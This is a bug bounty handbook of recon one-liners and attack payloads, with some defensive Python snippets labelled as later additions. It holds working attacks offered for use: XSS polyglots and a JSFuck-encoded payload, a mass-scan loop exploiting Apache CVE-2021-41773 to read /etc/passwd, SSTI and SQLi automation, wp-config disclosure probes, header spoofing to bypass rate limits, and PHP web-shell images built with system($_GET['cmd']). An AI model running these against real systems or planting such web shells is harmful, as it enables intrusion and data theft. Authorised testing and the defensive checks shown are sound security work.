Bug Bounty Notes
Bug Bounty Handbook
Table of Contents
- Automated Subdomain Monitoring
- Burp Suite Extensions
- JavaScript
- Enumerate Subdomains, Web Servers and API Endpoints
- Find CNAME Records
- Find hidden Parameters in JavaScript Files
- Find JavaScript Files with gau and httpx
- Find Open Redirects
- Find Secrets in JavaScript Files
- Find Subdomains based on Certificates
- Find SQL-Injection (SQLi) at Scale
- Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload
- Find Cross-Site Scripting (XSS) at Scale
- Fingerprinting with Shodan and Nuclei
- Hunting Checklist
- Path Traversal Zero-Day in Apache HTTP Server (CVE-2021-41773)
- Server-Side Template Injection (SSTI) at Scale
- Wayback Machine
- waybackurls
- Web Shell / Malicious Images
- Wordpress Configuration Disclosure
- Cross-Site Scripting (XSS)
Resources
| Name | Description | URL |
|---|---|---|
| Bug Crowd | Bug Bounty Platform | https://www.bugcrowd.com |
| CrowdStream | CrowdStream is a showcase of accepted and disclosed submissions on participating programs. | https://bugcrowd.com/crowdstream?filter=disclosures |
| disclose.io | We’re here to make vulnerability disclosure safe, simple, and standardized for everyone. | https://disclose.io |
| HackerOne | Bug Bounty Platform | https://www.hackerone.com |
| Hacktivity | See the latest hacker activity on HackerOne | https://hackerone.com/hacktivity |
| InfoSecHub | n/a | https://linksshare.io |
| Intigriti | Bug Bounty Platform | https://www.intigriti.com |
Automated Subdomain Monitoring
https://github.com/hakluke/haktrails
https://github.com/tomnomnom/anew
https://github.com/projectdiscovery/notify
Installation
```shell
$ go install -v github.com/hakluke/haktrails@latest
$ go install -v github.com/tomnomnom/anew@latest
$ go install -v github.com/projectdiscovery/notify/cmd/notify@latest
```
Configuration
haktrails
```shell
$ vi ~/.config/haktools/haktrails-config.yml
```
```yaml
securitytrails:
  key: <API_KEY>
```
Notify
```shell
$ vi ~/.config/notify/provider-config.yaml
```
```yaml
slack:
  - id: "slack"
    slack_channel: "recon"
    slack_username: "test"
    slack_format: ""
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
  - id: "vulns"
    slack_channel: "vulns"
    slack_username: "test"
    slack_format: ""
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
discord:
  - id: "crawl"
    discord_channel: "crawl"
    discord_username: "test"
    discord_format: ""
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
  - id: "subs"
    discord_channel: "subs"
    discord_username: "test"
    discord_format: ""
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
telegram:
  - id: "tel"
    telegram_api_key: "XXXXXXXXXXXX"
    telegram_chat_id: "XXXXXXXX"
    telegram_format: ""
    telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)
pushover:
  - id: "push"
    pushover_user_key: "XXXX"
    pushover_api_token: "YYYY"
    pushover_format: ""
    pushover_devices:
      - "iphone"
smtp:
  - id: email
    smtp_server: mail.example.com
    smtp_username: test@example.com
    smtp_password: password
    from_address: from@email.com
    smtp_cc:
      - to@email.com
    smtp_format: ""
    subject: "Email subject"
    smtp_html: false
    smtp_disable_starttls: false
googlechat:
  - id: "gc"
    key: "XXXXXXXX"
    token: "XXXXXX"
    space: "XXXXXX"
    google_chat_format: ""
teams:
  - id: "recon"
    teams_webhook_url: "https://<domain>.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
    teams_format: ""
custom:
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: ''
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
custom:
  - id: webhookJson
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{"text": }'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
custom:
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_sprig: '{"text":""}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
```
Monitoring Oneliner
```shell
$ while :; do echo <DOMAIN> | haktrails subdomain | anew subdomains.txt; sleep 86400; done | notify
```
Burp Suite Extensions
- JS Link Finder
- Upload Scanner
- Turbo Intruder
- HTTP Request Smuggler
- Auth Analyzer
JavaScript
JSFuck
http://www.jsfuck.com/
https://github.com/aemkei/jsfuck
https://github.com/aemkei/jsfuck/blob/master/jsfuck.js
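A JSFuck payload such as the one in this section is written with only the six characters `[]()!+`, so a filter that looks for `alert` or `eval` never sees anything. Added defensive example, not from the original page or the JSFuck project: a Python check that flags a request value, or a quoted attribute inside it, when it is a long, near-pure run of that alphabet; the function names and the length/purity thresholds are my assumptions and should be tuned against real traffic.

```python
import re

# Six characters suffice to write any JavaScript in JSFuck, which is why
# keyword-based filters never match the encoded script.
JSFUCK_ALPHABET = frozenset("[]()!+")

# Quoted attribute values, where an encoded handler (onerror="...") usually sits.
ATTR_RE = re.compile(r'=\s*(?:"([^"]*)"|\'([^\']*)\')')


def jsfuck_ratio(text):
    """Share of non-whitespace characters that belong to the JSFuck alphabet."""
    chars = [c for c in text if not c.isspace()]
    if not chars:
        return 0.0
    return sum(c in JSFUCK_ALPHABET for c in chars) / len(chars)


def looks_like_jsfuck(value, min_len=32, threshold=0.9):
    """True if the value, or any quoted attribute in it, is a long near-pure
    JSFuck string.

    Ordinary code uses brackets and plus signs too, so two guards keep the false
    positive rate down: the candidate must be at least min_len characters after
    whitespace is removed, and at least `threshold` of them must come from the
    alphabet. Checking attributes separately catches a payload hidden inside
    otherwise ordinary markup.
    """
    candidates = [value]
    for double_quoted, single_quoted in ATTR_RE.findall(value):
        candidates.append(double_quoted or single_quoted)
    for cand in candidates:
        compact = "".join(cand.split())
        if len(compact) >= min_len and jsfuck_ratio(compact) >= threshold:
            return True
    return False
```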
```javascript
![]                                        // false
!![]                                       // true
[][[]]                                     // undefined
+[![]]                                     // NaN
+[]                                        // 0
+!+[]                                      // 1
!+[]+!+[]                                  // 2
[]                                         // Array
+[]                                        // Number
[]+[]                                      // String
![]                                        // Boolean
[]["filter"]                               // Function
[]["filter"]["constructor"]( <CODE> )()    // eval
[]["filter"]["constructor"]("<FOOBAR>")()  // window
```
Encoded Payload
```html
<img src onerror="(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]++[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]]">
```
Enumerate Subdomains, Web Servers and API Endpoints
```shell
$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; for i in $(cat <DOMAIN>_httpx.txt); do DOMAIN=$(echo $i | /home/<USERNAME>/go/bin/unfurl format %d); ffuf -u $i/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt -o ${DOMAIN}_ffuf.txt; done
```
Find CNAME Records
```shell
$ for ip in $(cat <FILE>.txt); do dig $ip | grep CNAME; done
```
Find hidden Parameters in JavaScript Files
```shell
$ assetfinder <DOMAIN> | gau | egrep -v '(\.css|\.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '\.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
```
Find JavaScript Files with gau and httpx
```shell
$ echo http://<DOMAIN> | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
```
Find Open Redirects
```shell
$ echo "http://<RHOST>" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"
```
Find Secrets in JavaScript Files
```shell
$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; cat <DOMAIN>_httpx.txt | nuclei -t /home/<USERNAME>/opt/03_web_application_analysis/nuclei-templates/exposures/tokens -o token-expose.txt
```
Find Subdomains based on Certificates
```shell
$ curl -s https://crt.sh/\?q\=<DOMAIN>\&output\=json | jq . | grep 'name_value' | awk '{print $2}' | sed -e 's/"//g'| sed -e 's/,//g' | awk '{gsub(/\\n/,"\n")}1' | sort -u
```
Find SQL-Injection (SQLi) at Scale
```shell
$ subfinder -d <DOMAIN> -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a <URLS_FILE>
$ cat <URLS_FILE> | gf sqli | tee -a <SQLI_FILE>
$ while read line; do sqlmap -u $line --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < <SQLI_FILE>
```
Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload
```html
'"><svg/onload=alert()>
```
Find Cross-Site Scripting (XSS) at Scale
XSStrike
https://github.com/s0md3v/XSStrike
https://github.com/lc/gau
https://github.com/projectdiscovery/katana
```shell
$ echo <DOMAIN> | gau | while read url; do python3 xsstrike.py -u $url --crawl -l 4 -d 5; done
$ echo <DOMAIN> | katana | while read url; do python3 xsstrike.py -u $url --crawl -l 4; done
$ subfinder -d <DOMAIN> -all -silent | httpx -silent | katana -silent | Gxss -c 100 | dalfox pipe --skip-bav --skip-mining-all --skip-grepping
```
Fingerprinting with Shodan and Nuclei
```shell
$ shodan domain <DOMAIN> | awk '{print $3}' | httpx -silent | nuclei -t /PATH/TO/TEMPLATES/nuclei-templates/
```
Hunting Checklist
Domains
- Find Subdomains
- Check CNAME Records of those subdomains and check for Subdomain Takeover
- Use WaybackUrls for URLs
- Use
- Use MassScan for Port Scanning
- Do Github recon
Web Applications
- Check for CORS Misconfiguration
- Check for Email Header Injection on Password Reset Function
- Check for SMTP and HOST Header Injection
- Check for IFRAMEs (Clickjacking)
- Check for Improper Access Control and Parameter Tampering
- Check Burp History for finding endpoints
- Use Arjun for finding hidden endpoints
- Check for Cross-Site Request Forgery (CSRF)
- Check for Server-Side Request Forgery (SSRF) Parameters
- Check for Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI)
- Check Cryptography in Reset Password Token
- Check for Unicode Injection in Email Parameters
- Check for Bypassing Rate Limits
Headers
```http
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Forwarded-Host: IP
```
- Perform Directory Busting
- Check for HTTP Request Smuggling
- Check for Open Redirect through WaybackUrls
- Check for Social-Signon Bypass
- Check for state parameter in Social Sign-In & check whether it's possible to cause Denial of Service (DoS) using Multiple Cookie Injection
- Check for File Upload: CSRF, XSS, SSRF, RCE, LFI, XXE
- Check for Buffer Overflow
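The rate-limit bypass headers in the checklist above only work against a limiter that trusts client-supplied headers. Added example, not from the original page: a Python helper that keys the limiter on the TCP peer, consults X-Forwarded-For only when the peer is one of the site's own proxies and only from the right-hand end, and reports which of the spoofable headers a request carried. The proxy range and all function names are my assumptions.

```python
import ipaddress

# The request headers from the checklist. Every one is set by the client, so a
# limiter that keys on them lets a single host pose as as many clients as it likes.
SPOOFABLE_HEADERS = ("X-Originating-IP", "X-Forwarded-For", "X-Remote-IP",
                     "X-Remote-Addr", "X-Client-IP", "X-Forwarded-Host")

# Assumption for the example: the site's reverse proxies live in this range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]


def parse_ip(text):
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def is_trusted_proxy(ip):
    return ip is not None and any(ip in net for net in TRUSTED_PROXIES)


def rate_limit_key(remote_addr, headers):
    """Return the address a rate limiter should count for this request.

    remote_addr is the TCP peer; headers is a dict of request headers. Only
    X-Forwarded-For is consulted, only when the peer is a trusted proxy, and it
    is read from the right: a proxy appends the address it actually saw, so the
    rightmost hop that is not itself a trusted proxy is the client. Anything the
    client put in front of it, or in any other header, is ignored.
    """
    if not is_trusted_proxy(parse_ip(remote_addr)):
        return remote_addr
    for hop in reversed(headers.get("X-Forwarded-For", "").split(",")):
        ip = parse_ip(hop)
        if ip is not None and not is_trusted_proxy(ip):
            return str(ip)
    return remote_addr


def spoofed_client_headers(headers):
    """Names of the checklist headers present in a request. When the peer is
    not a trusted proxy nobody legitimate set them, which is worth logging."""
    present = {name.lower() for name in headers}
    return [h for h in SPOOFABLE_HEADERS if h.lower() in present]
```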
Path Traversal Zero-Day in Apache HTTP Server (CVE-2021-41773)
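The defender's side of the check in this section is to look for the same request shape in Apache access logs. Added example, not from the original page: a Python scanner that flags requests whose path segments only become `..` after percent-decoding, run over constructed sample log lines in combined format; the log lines, addresses and function names are mine.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format, not real traffic.
# The first two carry the encoded dot-segments of CVE-2021-41773; the last two
# are ordinary requests, including a literal "../" that Apache normalises away.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Oct/2021:10:15:32 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1450 "-" "curl/7.68.0"
198.51.100.7 - - [05/Oct/2021:10:15:40 +0000] "GET /cgi-bin/.%2E/%2E%2E/%2E%2E/etc/hosts HTTP/1.1" 403 199 "-" "curl/7.68.0"
203.0.113.5 - - [05/Oct/2021:10:16:01 +0000] "GET /images/logo.png HTTP/1.1" 200 3245 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Oct/2021:10:16:05 +0000] "GET /docs/../index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD path protocol", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')


def encoded_dot_segments(path):
    """Path segments that only become ".." once percent-decoded.

    A literal "/../" is collapsed by Apache before the path is checked; in
    2.4.49 "%2e" (any case) slipped past that check and was decoded afterwards,
    so the encoded form is the signal worth alerting on.
    """
    raw = path.split("?", 1)[0]
    return [seg for seg in raw.split("/")
            if "%2e" in seg.lower() and unquote(seg) == ".."]


def scan_access_log(text):
    """Return (client_ip, status, path) for each request with encoded dot-segments.

    The status tells the analyst what happened: 403 means the server refused
    the request, 200 means it was served and the host needs patching and an
    incident review.
    """
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and encoded_dot_segments(m.group(2)):
            hits.append((m.group(1), int(m.group(3)), m.group(2)))
    return hits
```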
```shell
$ cat <FILE>.txt | while read host; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo -e "$host \033[0;31mVulnerable\n" || echo -e "$host \033[0;32mNot Vulnerable\n"; done
```
Server-Side Template Injection (SSTI) at Scale
```shell
$ echo "<DOMAIN>" | subfinder -silent | waybackurls | gf ssti | qsreplace "" | parallel -j50 -q curl -g | grep "root:x"
```
Wayback Machine
Password Search
- Access https://web.archive.org/
- Type in the desired domain
- Switch to the URL tab: https://web.archive.org/web/*/https://<DOMAIN>/*
- Apply the filter `%40` (the URL-encoded `@`, which surfaces archived URLs that carry e-mail addresses or embedded credentials)
waybackurls
https://github.com/tomnomnom/waybackurls
```shell
$ waybackurls <DOMAIN> | grep --color -E '\.xls|\.tar\.gz|\.bak|\.xml|\.xlsx|\.json|\.rar|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tgz|\.7z'
```
Web Shell / Malicious Images
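The images built in this section keep only the first bytes of a real JPEG or PNG, enough to satisfy a magic-byte check, and put PHP straight after them. Added example, not from the original page: a Python upload check that treats the extension allow-list and the signature as necessary but not sufficient, and rejects data that carries server-side code markers; the constant and function names are mine.

```python
import re

# Signatures the polyglots imitate: JPEG starts FF D8 FF, PNG has an 8-byte
# signature. The PNG stub in this section copies only its first four bytes, so
# it already fails the full signature; the JPEG stub passes and needs the scan.
MAGIC = {
    "jpg": b"\xFF\xD8\xFF",
    "jpeg": b"\xFF\xD8\xFF",
    "png": b"\x89PNG\r\n\x1a\n",
}

# Server-side code markers that have no business inside image data. The match
# is case-insensitive because PHP executes "<?PHP" exactly like "<?php".
CODE_MARKERS = re.compile(rb"<\?(?:php\b|=|\s)|<%|<script\b", re.IGNORECASE)


def check_upload(filename, data):
    """Return "ok" or the reason an uploaded image should be rejected.

    Only the final extension is consulted; whatever name is accepted, the file
    should be stored under a server-generated name so a double extension never
    reaches the web server. A valid header is exactly what a polyglot provides,
    so the code-marker scan is the step that actually catches it.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return "extension-not-allowed"
    if not data.startswith(MAGIC[ext]):
        return "magic-mismatch"
    if CODE_MARKERS.search(data):
        return "embedded-code"
    return "ok"
```

Binary image data can contain `<?` by chance, so the robust mitigation is to re-encode every accepted image with an image library on save, which drops anything appended after the pixel data; the scan above is the cheap first gate.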
```shell
$ echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > <FILE>.jpg
$ echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > <FILE>.png
```
Wordpress Configuration Disclosure
```shell
$ subfinder -silent -d <DOMAIN> | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60
```
Cross-Site Scripting (XSS)
Polyglot Payload
Note the HTML tags that need to be closed for the XSS payload to fire.
```html
<!-- <title> <textarea> <style> <noscript> <xmp> <template> <noembed> --></title></textarea></style></noscript></script></xmp></template></noembed><svg/onload=alert()>
```
Single Domain One-liner
```shell
$ echo https://<DOMAIN>/ | gau | gf xss | uro | Gxss | kxss | tee <FILE>.txt
```
This post is licensed under CC BY 4.0 by the author.